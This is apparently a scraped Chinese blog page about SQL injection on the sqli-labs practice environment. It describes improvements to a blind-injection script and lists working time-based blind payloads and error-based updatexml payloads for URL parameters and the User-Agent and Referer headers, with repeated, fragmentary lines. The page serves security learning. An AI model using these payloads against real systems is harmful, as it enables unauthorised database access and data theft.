anddddoooo的博客

给我之前写的sql注入脚本进行了一些升级，此文章就是对升级内容的分析，升级内容如下：使用占位符foo来填充payload里需要经常修改的部分自动判断循环支持爆破和二分查找法来枚举一个字符显示枚举一个字符所需要的时间和数据包的数量二分查找的优点和缺点。

或者如果：id=1' and if(1=1,sleep(1),1) and '1'='1 语句能验证成功，也有可能是('')闭合：id=1') and if(1=1,sleep(1),1) and ('1')=('1 原因如下。id=1') and if(1=1,sleep(1),1) and ('1')=('1 # 单引号括号闭合。

【代码】sqli-lab时间盲注、布尔盲注脚本。

sort=1' and if(1=1,sleep(0.05),1) and '1'='1 # 单引号闭合。sort=1' and if(1=1,sleep(0.05),1) and '1'='1 # 单引号闭合。id=1' and if(1=1,sleep(1),1) and '1'='1 # 单引号闭合。

password：id=1' and if(1=1,sleep(1),1) and '1'='1 # 单引号闭合。uagent:1' and updatexml(1,concat(0x7e,(database()),0x7e),1) or '1'='1 # 报错回显。Referer:1' and updatexml(1,concat(0x7e,(database()),0x7e),1) or '1'='1 # 报错回显。